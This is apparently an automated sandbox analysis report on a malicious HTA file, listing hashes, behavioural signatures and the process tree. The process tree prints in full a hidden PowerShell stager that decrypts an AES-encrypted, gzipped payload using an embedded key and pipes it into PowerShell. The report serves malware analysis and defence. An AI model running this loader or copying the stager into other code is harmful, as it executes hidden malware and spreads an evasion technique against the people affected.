Analysis
-
max time kernel
169s -
max time network
190s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
-
submitted
10-01-2024 21:28
General
-
Target
163.5.169.28/SCAN-atoletter4.hta
-
Size
1.1MB
-
MD5
4bde59d84e71c0ff88901e353dbe3eec
-
SHA1
3000483b2add41716148b8e11fa283f6db6a9cf1
-
SHA256
992820187d1f871cb816dfb5839c0a71dfde38626d6947b4d912d04cf585454d
-
SHA512
38a11e2bbba9b26f5651d09f072109cb1b77717c53322a47147e1560016d409c528639be48f2044f038a6b24bad5cf0df200a83ca80c5a27d49fe5b91ecbb0b4
-
SSDEEP
1536:sSdyqS4pxRNGWLPcX/WhEdbVhtmr/l1vcmafSIm+lIWFXvD+v/j53mD0QMYPhgg9:ldHzpxdPcPWhqxki
Score
7/10
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\SCAN-atoletter4.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $SWFMmek = 'AAAAAAAAAAAAAAAAAAAAACrZRvtkqB+SHe0p7lRkPZCNffnqqNClKC3So/ocYip4sIyLwLexWoYN7uQd/Ni71WfNRscuLftSXeNk7UaJGUgjzJYfkZsxtrK18RTQmLCW1pIarAJy+MJgSjZUVMYQWdzwp+win+j10i0G4ZEMS3Xwvcmtwp4oreEie4++NHNNK2xEseGT95QYttS79tMZNR2aXcwdmz1PdnPCFNNhhpyh/taE0Q+6n78bMLTSIE13KTsORNrtCzIgtr3Y0F1MB9lb8eEcPuCw7QaX9ogPRTbwqpZkgv7Y5HUJp0VxDjKql+k0p/kyTsOYemh+qvVkfCSk6ARTZtYYlK+XrkeiPImuz2YM4VwLp2nVNOX6JctQj0eiDB4VQm9iv0T+VU4hA8HLk0q8btV2B0AH8v/kyr25MRM3hDYzSanUXD7xVrSQeftYOypgt7WjJ8vNUUaoRo/O2fOth9pSsJc2PUN5u/1nv/4Qj+WJixqxHp0l9Em2HDhYTsuYx1zddhj9Fjo1g/q5KegORNjsCZpTNiQ8bZ5+3m5h7Ae23py3/VmFOHs+7jARtXTvc5QaAw8PHsDPwSLOKvttyOVKC9nRw5gMdke8E209RPYi+barMiX+Y0P6pDZX47hNfd4uxyY8pnxh1Ysda+Pkk3HMSro15we0nkfamNuIcZ8nJ3XBLA5P/MCMBjuT0W22qHkYVUta9v5eWbqcqW01JrayDLz8V4s/+gKnsbVKwzyoKLtl2cG3vRKpMIzrkc4lxk3l8hOrWqFA4t1Vwx+QeDMmheCrhjT7XLVkej9g76eA9HU2lkuHzolmO0lqP4jtT3xUaKVm5vxJBNDNWGmucLBb42Qvtj/9p4lzILR2oNWO5KzDentXeSmfn7IB+FlXrUi9slXX3mXyPhgx2Fp0HvzP5urbnjmftQaHY1jea7V8sMzWju3VTNpAUYnsOS+P15fXwV7T+C5zvH2sdtqlGPmRZC/xpTwT0CRGhfvZR2OnzvHMZ3Xj1Wi+9A72v/hxGHJ2b1bUvX50vw==';$ketcPRkA = 'U0phVmZDTVVXbkJUdW5GeHZJUFFNamlmTFpJYmtVVkQ=';$MStdDqI = New-Object 'System.Security.Cryptography.AesManaged';$MStdDqI.Mode = [System.Security.Cryptography.CipherMode]::ECB;$MStdDqI.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$MStdDqI.BlockSize = 128;$MStdDqI.KeySize = 256;$MStdDqI.Key = [System.Convert]::FromBase64String($ketcPRkA);$ebtMY = [System.Convert]::FromBase64String($SWFMmek);$tioyoVVE = $ebtMY[0..15];$MStdDqI.IV = $tioyoVVE;$UxxTAdKnB = $MStdDqI.CreateDecryptor();$SnQEJbKME = $UxxTAdKnB.TransformFinalBlock($ebtMY, 16, $ebtMY.Length - 16);$MStdDqI.Dispose();$XYnpOOa = New-Object System.IO.MemoryStream( , $SnQEJbKME );$ZfRyjXCe = New-Object System.IO.MemoryStream;$MHLhPIhJc = New-Object System.IO.Compression.GzipStream $XYnpOOa, ([IO.Compression.CompressionMode]::Decompress);$MHLhPIhJc.CopyTo( $ZfRyjXCe );$MHLhPIhJc.Close();$XYnpOOa.Close();[byte[]] $sLQaEk = $ZfRyjXCe.ToArray();$GdmkIOs = [System.Text.Encoding]::UTF8.GetString($sLQaEk);$GdmkIOs | powershell - }2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7.7MB